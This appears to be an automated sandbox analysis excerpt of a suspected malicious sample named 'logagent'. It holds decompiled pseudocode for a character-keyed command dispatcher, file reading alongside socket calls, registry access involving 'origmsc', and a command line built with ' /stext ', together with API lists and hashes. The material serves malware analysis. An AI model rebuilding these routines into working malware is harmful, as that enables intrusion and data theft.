                                  				char _v112;
                                  				char _v116;
                                  				intOrPtr* _v120;
                                  				intOrPtr _v124;
                                  				intOrPtr* _t24;
                                  				void* _t27;
                                  				intOrPtr _t36;
                                  				signed int _t38;
                                  				int _t40;
                                  				intOrPtr* _t41;
                                  				intOrPtr _t42;
                                  				intOrPtr _t49;
                                  				intOrPtr* _t54;
                                  				void* _t55;
                                  				intOrPtr _t57;
                                  
                                  				 *[fs:0x0] = _t57;
                                  				_v28 = _t57 - 0x68;
                                  				_v8 = 0;
                                  				 *0x415364(2, __edi, __esi, __ebx,  *[fs:0x0], 0x414130, 0x416e50, 0xffffffff, _t55);
                                  				 *0x41c26c =  *0x41c26c | 0xffffffff;
                                  				 *0x41c270 =  *0x41c270 | 0xffffffff;
                                  				 *((intOrPtr*)( *0x415368())) =  *0x41c264;
                                  				_t24 =  *0x41536c();
                                  				_t47 =  *0x41c260;
                                  				 *_t24 =  *0x41c260;
                                  				 *0x41c268 =  *((intOrPtr*)( *0x415370));
                                  				_t27 = E105468C9( *((intOrPtr*)( *0x415370)));
                                  				if( *0x41b190 == 0) {
                                  					_t27 =  *0x415374();
                                  					_t47 = 0x41412c;
                                  				}
                                  				E10555AA9(_t27);
                                  				L10555AA3();
                                  				_v112 =  *0x41c25c;
                                  				 *0x41537c( &_v100,  &_v116,  &_v104,  *0x41c258,  &_v112, 0x41b0e4, 0x41b0e8);
                                  				_push(0x41b0e0);
                                  				_push(0x41b000);
                                  				L10555AA3();
                                  				_t54 =  *((intOrPtr*)( *0x415380));
                                  				_v120 = _t54;
                                  				if( *_t54 != 0x22) {
                                  					while(1) {
                                  						__eflags =  *_t54 - 0x20;
                                  						if(__eflags <= 0) {
                                  							goto L7;
                                  						}
                                  						_t54 = _t54 + 1;
                                  						_v120 = _t54;
                                  					}
                                  				} else {
                                  					do {
                                  						_t54 = _t54 + 1;
                                  						_v120 = _t54;
                                  						_t42 =  *_t54;
                                  					} while (_t42 != 0 && _t42 != 0x22);
                                  					if( *_t54 == 0x22) {
                                  						L6:
                                  						_t54 = _t54 + 1;
                                  						_v120 = _t54;
                                  					}
                                  				}
                                  				L7:
                                  				_t36 =  *_t54;
                                  				if(_t36 != 0 && _t36 <= 0x20) {
                                  					goto L6;
                                  				}
                                  				_v96.dwFlags = 0;
                                  				GetStartupInfoA( &_v96);
                                  				_t68 = _v96.dwFlags & 0x00000001;
                                  				if((_v96.dwFlags & 0x00000001) == 0) {
                                  					_t38 = 0xa;
                                  				} else {
                                  					_t38 = _v96.wShowWindow & 0x0000ffff;
                                  				}
                                  				_t40 = E1054A627(_t47, _t68, GetModuleHandleA(0), 0, _t54, _t38);
                                  				_v108 = _t40;
                                  				exit(_t40);
                                  				_t41 = _v24;
                                  				_t49 =  *((intOrPtr*)( *_t41));
                                  				_v124 = _t49;
                                  				_push(_t41);
                                  				_push(_t49);
                                  				L10555A9D();
                                  				return _t41;
                                  			}


                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
• Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                  • String ID:
                                  • API String ID: 801014965-0
                                  • Opcode ID: cc7414d8dedd444570a0f7fe2e671c385d734ec20d1b5609852bcbaeda24d750
                                  • Instruction ID: 6279e085c1c710bb80de42cc0caf49608318eda4358571d45753d58833216366
                                  • Opcode Fuzzy Hash: cc7414d8dedd444570a0f7fe2e671c385d734ec20d1b5609852bcbaeda24d750
                                  • Instruction Fuzzy Hash: 3F4188B4C40748EFDB20CFE0DC99ADABFB8FB49755B20422BE851972A0D7B45884CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AD79
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 0040AD91
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040ADA1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040ADB0
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADDB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADF1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE07
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE1D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE33
                                    • Part of subcall function 0040AE6A: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                    • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                    • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                    • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                    • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                    • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                    • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                    • Part of subcall function 004020F4: closesocket.WS2_32(0041BE70), ref: 004020F9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE56
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE5F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@$D@1@@G@std@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@FileG@1@@G@2@@std@@ModuleNameV01@V10@V10@0@V10@@closesocket
                                  • String ID:
                                  • API String ID: 1795822965-0
                                  • Opcode ID: 577d363030fa7591e52d31dd8c7d90d933b05a2efaa5bb55a7e707ed632d8bb6
                                  • Instruction ID: 48313c0a065dcb0dcea7f82e9129112a0e8bb123b90d7e9a0fd4ac289fd1d0c5
                                  • Opcode Fuzzy Hash: 577d363030fa7591e52d31dd8c7d90d933b05a2efaa5bb55a7e707ed632d8bb6
                                  • Instruction Fuzzy Hash: D3216271A0010DABCB04BBB5DD5A9EE3778EF44341F408569E922A71E1EF745604CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 105439C7: socket.WS2_32(00000000,00000001,00000006), ref: 105439E2
                                  • CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000), ref: 105451D4
                                  • GetFileSize.KERNEL32(00000000,?), ref: 1054520A
                                  • ??2@YAPAXI@Z.MSVCRT ref: 105452CF
                                  • SetFilePointer.KERNEL32(?,?,?,?), ref: 105452E3
                                  • ReadFile.KERNEL32(?,?,0000FDE8,?,?), ref: 105452F7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                   • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$??2@CreatePointerReadSizesocket
                                  • String ID: [INFO]
                                  • API String ID: 3751854038-4019176272
                                  • Opcode ID: a3579aec32f10f629416afd3da562235689607cd4f213818c8e25dca34f4bb62
                                  • Instruction ID: c785e0b80a8627d9286ff1b3d4790daa99c1430b298d72f01476a4acf643aa22
                                  • Opcode Fuzzy Hash: a3579aec32f10f629416afd3da562235689607cd4f213818c8e25dca34f4bb62
                                  • Instruction Fuzzy Hash: 72C11771C0020DEFDF05EFA0EC99EEEBB79EF44245F108166F416A6160EA716A49CF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                  • time.MSVCRT ref: 004124E5
                                  • srand.MSVCRT ref: 004124F2
                                  • rand.MSVCRT ref: 00412506
                                  • rand.MSVCRT ref: 0041251A
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                  Strings
                                  • abcdefghijklmnopqrstuvwxyz, xrefs: 004124D5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@rand$??1?$basic_string@D@1@@V01@V01@@Y?$basic_string@srandtime
                                  • String ID: abcdefghijklmnopqrstuvwxyz
                                  • API String ID: 3357298394-1277644989
                                  • Opcode ID: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                  • Instruction ID: 712daf16f8b1022a6d974ed1f73c2a3049aadf137e9a4f533f5eb28a92ccc556
                                  • Opcode Fuzzy Hash: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                  • Instruction Fuzzy Hash: F211A57754021DEBCB04EBA1ED49AEE7BB9EB80361F104026FD01E71D0DA759945CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                    • Part of subcall function 0040B9E8: RegOpenKeyExW.ADVAPI32(80000001,0040B9BA,00000000,00000002,0040B9BA,?,0040B9BA,80000001,00000000), ref: 0040B9F9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??1?$basic_string@$??0?$basic_string@$?begin@?$basic_string@?c_str@?$basic_string@D@1@@$?end@?$basic_string@?length@?$basic_string@G@1@@OpenV01@@
                                  • String ID: origmsc
                                  • API String ID: 643209241-68016026
                                  • Opcode ID: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                  • Instruction ID: bc2c983ee8b044bee8b0063c187639ee25001bfa26dad0cec207db0dad549837
                                  • Opcode Fuzzy Hash: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                  • Instruction Fuzzy Hash: 9111B17280050DEFCF04EFE0ED598DE77B9EA482557104025F912D31A0EB71AA59CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6DF7CB60,?,?,0041225E,?), ref: 00412919
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                  • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,0041225E,?), ref: 0041296C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@V01@@$?find@?$basic_string@?length@?$basic_string@?replace@?$basic_string@G@1@@V12@
                                  • String ID: ^"A
                                  • API String ID: 1083762089-1057680782
                                  • Opcode ID: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                  • Instruction ID: 92156a76a3fbabd4be7b0d6bbce5c3b04c59df92facb318773be45834bd60316
                                  • Opcode Fuzzy Hash: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                  • Instruction Fuzzy Hash: C201083650051EEFCF049F64EC489ED3BB8FB84355B048564FC16972A0EB70AA55CF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 15%
                                  			E00411C4C(void* __eflags, intOrPtr _a4) {
                                  				char _v20;
                                  				void* _v36;
                                  				char _v52;
                                  				int _t21;
                                  				signed int _t35;
                                  				void* _t39;
                                  				void* _t45;
                                  				void* _t61;
                                  				void* _t62;
                                  				void* _t63;
                                  				void* _t64;
                                  				void* _t65;
                                  				intOrPtr _t67;
                                  				void* _t69;
                                  				void* _t71;
                                  				void* _t72;
                                  				void* _t75;
                                  
                                  				_t75 = __eflags;
                                  				_t67 = _a4;
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t67 + 0x18);
                                  				_t21 = SetEvent( *(_t67 + 0x28));
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				_t71 = _t69;
                                  				_t45 = _t71;
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				E004129EB(_t75,  &_v20,  &_v52, 0x41b310,  &_v52, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                  				_t72 = _t71 + 0x24;
                                  				_t61 =  *_t21 - 0x61;
                                  				if(_t61 == 0) {
                                  					_push(E0040180C( &_v20, __eflags, 2));
                                  					_push(E0040180C( &_v20, __eflags, 1));
                                  					_push(E0040180C( &_v20, __eflags, 0));
                                  					_push(_t72 - 0x10);
                                  					E00411D8A(E00412881(_t29));
                                  				} else {
                                  					_t62 = _t61 - 0x3d;
                                  					if(_t62 == 0) {
                                  						E00411A24(_t45);
                                  					} else {
                                  						_t63 = _t62 - 4;
                                  						if(_t63 == 0) {
                                  							_t35 = E0040180C( &_v20, __eflags, 0);
                                  							__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
                                  							__eflags =  *_t35;
                                  							E00411B59(E0040180C( &_v20,  *_t35, 1), _t35 & 0xffffff00 | __eflags != 0x00000000);
                                  						} else {
                                  							_t64 = _t63 - 3;
                                  							if(_t64 == 0) {
                                  								_t39 =  *0x41c1d4;
                                  								__eflags = _t39;
                                  								if(_t39 != 0) {
                                  									SetEvent(_t39);
                                  								}
                                  							} else {
                                  								_t65 = _t64 - 1;
                                  								if(_t65 == 0) {
                                  									 *0x41c1d2 = 1;
                                  								} else {
                                  									if(_t65 == 1) {
                                  										 *0x41c1d3 = 1;
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				E004017DD( &_v20);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}


                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411C5E
                                  • SetEvent.KERNEL32(?), ref: 00411C6D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00411C72
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 00411C8A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00411C9A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411CA9
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
